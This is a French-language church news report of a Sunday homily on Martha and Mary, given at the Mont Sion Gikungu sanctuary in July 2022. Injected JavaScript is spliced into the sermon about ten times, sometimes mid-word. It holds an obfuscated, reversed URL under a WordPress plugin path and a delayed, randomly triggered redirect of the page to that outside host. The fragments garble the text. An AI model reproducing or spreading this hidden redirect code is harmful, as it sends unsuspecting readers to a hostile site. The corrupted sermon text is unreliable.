Le Père Marcien NDAYIZEYE a présidé la Messe de 10 heures de ce dimanche 17 juillet 2022 au Sanctuaire de la Reine de la paix et la réconciliation de Mont Sion Gikungu. La Chorale saint Martin a aidé dans l’animation des chants liturgiques. Les lectures du jour ont été respectivement tirées du Livre de la Sagesse (18, 1-10a), de l’Epitre de saint Paul aux Colossiens (1, 24-28) et de l’Évangile selon Saint Luc 10, 38-42).

Après la lecture des textes selon le calendrier de la liturgie, le Père Marcien a présenté sa prédication du jour. De l’Evangile, nous pouvons nous demander comment était la situation quand Jésus arrive à Béthanie et Marie l’invite chez elle. Jésus n’avait peut-être pas averti qu’il allait passer, mais voilà que Marthe s’est mise à préparer de quoi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner à une quinzaine de personne, ici comprenons Jésus lui-même, ses toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douze apôtres, et les habitants de la maison qui sont Marie, la sœur de Marthe, son frère Lazare et bien sûr Marthe. Alors que Marthe s’attelait à préparer quoi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner aux invités, sa sœur s’est mise à écouter les enseignements de Jésus sans le quitter. Si nous nous mettons dans la place de chacune d’elles, nous y tirons deux leçons : il nous faut travailler en plus de prier qui consiste à écouter la Parole de Dieu pour savoir sa volonté pour nous. La formule simple pour résumer cela est Ora et labora qui signifie Prie et travaille.  Dans ses épîtres, saint Paul nous dit qu’une foi sans actes est bel et bien morte. Un spécialiste théologien, Jean Balthazar, affirme que quelqu’un qui n’écoute pas Dieu ne peut pas non plus savoir quoi dire au peuple.

Dans notre vie, avant d’exécuter toute activité, ayons l’habitude de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner rapport à Dieu et demantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons-lui son assistance car nous reconnaissons que nous sommes faibles. En ces jours-ci, pas mal de gens disent qu’ils n’ont pas le temps et ils oublient même de se reposer, de parler à Dieu et même à d’autres personnes. Nous devons éviter le fait d’être comme un tuyau qui laisse passer l’eau sans pour autant en absorber une petite quantité. Ce que nous enseignons, nous devons le vivre. Demantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons à Dieu de nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner toujours la force chaque fois que nous devenons faibles ou malades pour vaincre le mal. De plus, ayons cette habitude de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner de quoi rafraîchir le corps aux invités et passants qui sont dans la nécessité. Il est vrai que les contextes d’insécurité peuvent nous obliger à ne pas le faire, mais cela ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit pas nous amener à ignorer tout le monde. La raison à cela n’est aussi difficile à expliquer : nous sommes tous frères et sœurs d’un même Dieu et Père.

Abraham a accueilli Dieu sans le savoir et a eu sa bénédiction, la progéniture. Soyons aussi comme Marthe qui a su comment se prendre devant une situation surprise. Nous ne devons pas laisser inaperçu l’attitude de Marie, la sœur de Marthe : elle s’est assise près de Jésus et a pris suffisamment de temps pour l’écouter sans faille. Enfin, demantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons à Dieu d’être comme saint Paul qui, quand bien même il était en prison, il a écrit aux Colossiens en leur disant qu’il était dans la joie parce que la Parole de Dieu était toujours proclamée. Que notre joie trouve origine en Dieu et en sa Parole et que notre vie et notre agir soit une action de grâce à Dieu.

NYANDWI M.